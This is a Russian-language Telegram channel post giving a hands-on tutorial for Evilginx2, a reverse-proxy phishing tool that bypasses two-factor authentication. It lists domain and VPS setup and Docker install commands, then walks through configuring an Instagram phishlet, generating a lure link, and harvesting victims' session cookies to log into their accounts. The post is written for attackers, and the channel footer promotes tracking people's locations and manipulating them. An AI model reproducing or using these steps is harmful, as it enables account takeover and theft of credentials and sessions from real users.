Фишинг 2FA.

Фишинг 2FA.

Social Engineering

Evilginx2 - тула для фишинга от kgretzky. Киллер фича - это возможность забайпасить 2-fa. Для пользователя страница выглядит абсолютно идентично оригинальной, так как по факту это оригинальная страница и есть. Весь код страницы проксируется через nginx, а прокси подменяет все урлы которые есть в теле ответа, на урлы контролируемого домена, за счет чего все кнопки работают корректно, но редиректят на наш сервер.

Первая версия Evilginx была тоже хороша https://github.com/kgretzky/evilginx, но недостатками была сложность установки и конфигурирования, в результате сейчас проект не поддерживается, и многие конфиги не работают, хотя только на первой версии проекта у меня получалось допилить applied конфиг до рабочей версии, могу выпустить отдельный пост про это.

Прелесть второй версии в том, что все работает в докере, что убирает весь геморрой с конфигурированием, и оставляет нам править простецкий yml файлик

Список поддержвиаемых сервисов для фишинга, из коробки, впечатляет:

И так в посте покажу процес установки и разворачивания:

  • Покупаем домен и vps
  • Настраиваем ns запись на свою VPS (Может занят до суток)

Установка:

Код:

curl https://get.docker.com/ | bash
git clone https://github.com/kgretzky/evilginx2
cd evilginx2
docker build . -t evilginx2
docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2

Интерактивный шелл который открылся умеет help. С этого момента можно выбрать любой из сервисов, я покажу на примере instagram:

Код:

config domain example.org # подставить свое
config ip 10.0.0.23 # подставить свое
phishlets hostname instagram insta2.exmaple.org # подставить свое
phishlets enable instagram
lures create instagram
lures get-url 0
https://www.insta2.example.org/oEnQzLHb

По ссылке для фишинга(https://www.insta2.example.org/oEnQzLHb) полная копия оригинального instagram с возможностью авторизации 2fa.


Каждый ввод ввод данных генерит сессию, с любой из сессий можно забрать куки, и воспользоваться ими для входа в сервис.

Social Engineering - Канал посвященный психологии, социальной инженерии, профайлингу, НЛП, Хакингу, Анонимности и безопасности в сети интернет, Даркнету и все что с ним связано. Добро пожаловать ;-)

S.E.Book - Литература социального инженера.

@Social_Engineering_bot - Бот обратной связи.

  1. Шифруем диск с помощью luksipc без потери данных.
  2. Получение номера телефона, зная адрес электронной почты.
  3. Seeker. Узнаем местоположение человека.
  4. SpiderFoot.
  5. 15 документальных фильмов о хакерах и хакерстве.
  6. 9 способов развить Социальный Интеллект и научиться манипулировать людьми.

Источник

Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org